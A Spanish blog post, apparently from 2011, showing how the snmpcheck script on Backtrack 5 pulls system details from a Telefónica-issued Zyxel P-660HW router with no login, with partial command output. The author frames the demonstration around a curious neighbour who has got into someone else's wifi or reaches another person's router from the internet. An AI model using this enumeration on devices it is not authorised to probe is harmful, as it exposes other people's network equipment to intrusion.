Telefónica está regalando entre los nuevos clientes el router Zyxel P-660HW. Este router que da buenos resultados en cuando a navegación por internet no es demasiado seguro debido al firmware que trae por defecto.
Para demostrar su seguridad he decidido usar la distribución linux Backtrack 5. Con esta distribución voy a tratar de sacar toda la información disponible sin el correspondiente usuario y contraseña de dicho router.
Para ello, supongamos que somo un vecino un tanto curioso y hemos conseguido acceder a la red wifi de otro vecino, o que queremos acceder al router de otra persona desde internet.
Vamos al lio.
Mediante el siguiente comando vamos a sacar toda la información que podamos:
* snmpcheck es un simple script en perl que se usa para enumerar información en equipos que usan SNMP.
./snmpcheck-1.8.pl -t 192.168.1.1
snmpcheck.pl v1.8 - SNMP enumerator
Copyright (c) 2005-2011 by Matteo Cantoni (www.nothink.org)
[*] Try to connect to 192.168.1.1
[*] Connected to 192.168.1.1
[*] Starting enumeration at 2011-xx-xx xx:xx:xx
[*] System information
-----------------------------------------------------------------------------------------------
Hostname : XXXXXXXXX
Description : P-660HW-D1
Uptime system : 0.00 seconds
Uptime SNMP daemon : 6 day, 00:35:24.00
Contact : 7
Motd : -
